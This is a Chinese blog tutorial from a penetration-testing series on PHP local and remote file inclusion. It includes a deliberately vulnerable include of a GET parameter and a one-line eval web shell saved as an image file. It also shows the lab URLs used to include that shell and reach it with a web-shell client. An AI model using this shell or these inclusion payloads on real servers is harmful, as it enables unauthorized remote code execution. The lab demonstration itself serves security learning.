渗透测试-文件包含漏洞

已于 2023-01-20 10:38:32 修改
阅读量1.6k 收藏 3
点赞数 1
分类专栏: 渗透测试 文章标签: 安全性测试 web安全 安全
于 2022-04-27 19:13:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/124457654
版权

文件包含漏洞

文章目录

前言

一、什么是文件包含漏洞

服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。

二、文件包含漏洞获取shell

1.文件包含漏洞的分类

文件包含漏洞分为本地包含和远程包含。
包含函数有以下几种类型
include(),include_once(),require(),requie_once()

远程包含漏洞
需要allow_url_include=on
magic_quotes_gpc=off

2.利用漏洞获取shell

我们进行演示一下什么是文件包含漏洞
首先我们在phpstudy的www目录下创建一个include目录,放入两个文件
包含一个包含代码的ok.php和一句话木马test.jpg文件
在这里插入图片描述
我们来看一下文件里的代码
这是ok.php的代码

<?php include "$_GET[page]"; ?>

这是test.jpg的一句话木马代码

<?php @eval($_POST['chopper']); ?>

我们进行利用漏洞
首先我们进行本地包含演示
http://192.168.222.4/include/ok.php?page=test.jpg(本地)
在这里插入图片描述
发现打开了,我们进行复制网址到蚁剑连接
在这里插入图片描述
连接成功,获取shell成功。
我们在进行远程包含漏洞演示
http://192.168.222.4/include/ok.php?page=http://192.168.222.4/include/test.jpg(远程)
在这里插入图片描述
打开了,我们进行复制网址到蚁剑连接
在这里插入图片描述
连接成功,获取shell成功,实验结束。

总结

本次实验简单讲述了文件包含漏洞的原理和利用,后续会讲述日志包含和php文件读写获取shell的方法。

炫彩@之星
关注
专栏目录
DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用
7Riven's blog
11-27 1281
什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含文件包含漏洞的成因 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...
61-61.渗透测试-文件包含漏洞修复方案.mp4
05-10
61-61.渗透测试-文件包含漏洞修复方案.mp4
Web安全文件包含漏洞测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
05-31 2015
文件包含漏洞是 程序员在开发网站的时候,为了方便自己开发构架,使用了一些包含的函数(比如:php开发语言,include() , include_once() , require_once() 等等),而且包含函数中的变量,没有做一些过滤或者限制,使得用户可以 控制传到服务器中的数据,导致文件包含漏洞
【网络安全渗透测试零基础入门必知必会】之什么是文件包含漏洞&分类(非常详细)零基础入门到精通,收藏这一篇就够了
资深程序员,曾自学JAVA,C#,如今从业于网安行业
08-06 831
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞
渗透测试文件包含漏洞&利用姿势
qq_46217803的博客
07-14 1383
文件包含漏洞的分类 大体可以分为:本地文件包含和远程文件包含。顾名思义,引用本地文件,利用inchude包含函数包含本地(服务器)文件。什么是动态变量? 利用协议读取源代码 截断%00 这里假设漏洞代码为 长度截断 漏洞代码演示 与上面原理差不多,在1.txt中写下实例: php:// 实例 如果具有一定的写入权限,POST 写入一句话木马 ...
渗透测试文件包含漏洞
weixin_52177486的博客
02-14 1098
文件包含漏洞:服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当作PHP执行,可以给开发者节省大量的时间,从而也导致了客户端可以调用一个恶意文件,造成文件包含漏洞。常见的文件包含函数require()、require_once()、include()、include_once()
文件包含漏洞实验
IT1995的博客
03-11 5636
在本次实验前要先开启远程包含如下图所示:某php程序员小白将下面的代码命名成test.php部署到网站http://websecurity.163.com/的根目录下&lt;?php $filename = $_GET['file'];//将参数file的值传递给$filename $filename = str_replace( array( "http://", "http...
60-60.渗透测试-文件包含漏洞挖掘与利用.mp4
05-10
60-60.渗透测试-文件包含漏洞挖掘与利用.mp4
信息安全-渗透测试-未授权漏洞汇总
最新发布
08-09
文件包含了未授权漏洞的大汇总,将经典案例总结呈现,适用于渗透测试小白更多地去了解未授权漏洞
56-56.渗透测试-什么是文件包含漏洞.mp4
05-10
56-56.渗透测试-什么是文件包含漏洞.mp4
文件包含漏洞测试
qq_43355651的博客
09-27 1601
文件包含漏洞 通过发生在PHP中 很多站点为了节约资源,在代码中写入了文件包含,将文件设置为变量,用户对变量的值可控,而服务器未对变量的值合理的校检,导致了文件包含漏洞的产生。 通常使用的函数: include():使用次函数包含文件时,发生错误会有警告,然后继续向下执行。 require();发生错误后,会终止运行。 可以通过文件包含来读取敏感文件等等 写入文件用 phpinfo 这里我们通过一次实验更好的理解一下文件包含漏洞: 这里我们用到的是墨者学院-phpMyAdmin后台文.
文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例
m0_64378913的博客
06-15 3127
概述:文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。定义:随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的
文件包含漏洞-实验
qq_52579508的博客
07-12 1359
实验靶场使用 LFI-Labs。
网安学习Day23-文件包含漏洞
weixin_44770698的博客
05-25 1035
文件包含的知识点框架如下: 文件包含的原理 大多数的Web语言都可以使用文件包含操作,其中PHP语言所提供的文件包含功能太强大、太灵活,所以文件包含漏洞经常出现在PHP语言中,但就是因为这种灵活性,从而导致客户端可以调用一个恶意文件,造成了文件包含漏洞。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。 攻击者会指定一个“
渗透测试基础 -文件包含漏洞
weixin_45488495的博客
05-05 905
渗透测试基础-文件包含漏洞文件包含是什么文件包含使用函数文件包含漏洞的形成文件路径巧用文件包含靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 文件包含是什么 举个例子:比如一个网站的后台,正常情况下是不允许其他非管理员访问的,会在网站后台里面加入一些代码,对其cookie或者session做限制。但是,网站后台大多数情况并非只有一个页面,那是不是每个页面都得加入这个验证身份的代码呢?答案是否定的,因为这样会导致代码的冗
渗透测试[文件包含]
npc88888的博客
03-12 791
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数 时直接调用此文件,而无需再次编写,这重文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞
渗透测试之本地文件包含漏洞
黑面狐
12-14 1842
1.概述 本地文件包含允许攻击者通过浏览器包含一个服务器上的文件。当一个WEB应用程序在没有正确过滤输入数据的情况下,就有可能存在这个漏洞,该漏洞允许攻击者操纵输入数据、注入路径遍历字符、包含web服务器的其他文件 2.实验 本地写了一个文件包含php文件 <?php $a=$_GET['test']; include($a); ?> 包含一个内容为的jpg文件,我们看看效果:
文件包含漏洞总结
weixin_46739058的博客
04-10 2813
目录 #文件包含各个脚本代码 #文件包含漏洞的检测 #本地包含-无限制,有限制 #远程包含-无限制,有限制 #文件包含结合伪协议 #文件包含漏洞防范措施 文件包含的作用:将文件以脚本的格式执行(根据当前网站脚本类型) #文件包含各个脚本代码 第八个 C 语言那个,是包含远程文件,其余的是包含本地文件 文件包含在 php 中,涉及到的危险函数有四个,分别是include()、include_once()、require()、require_once()。 区别如下:
深度解析:本地文件包含漏洞渗透测试策略
通过深入学习和实践本地文件包含漏洞的检测与利用方法,渗透测试人员能够提高自己的技能,同时也提醒开发者在开发过程中注重输入验证,以防止此类漏洞的发生。在CTF(Capture The Flag)竞赛中,理解和应对LFI漏洞也...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值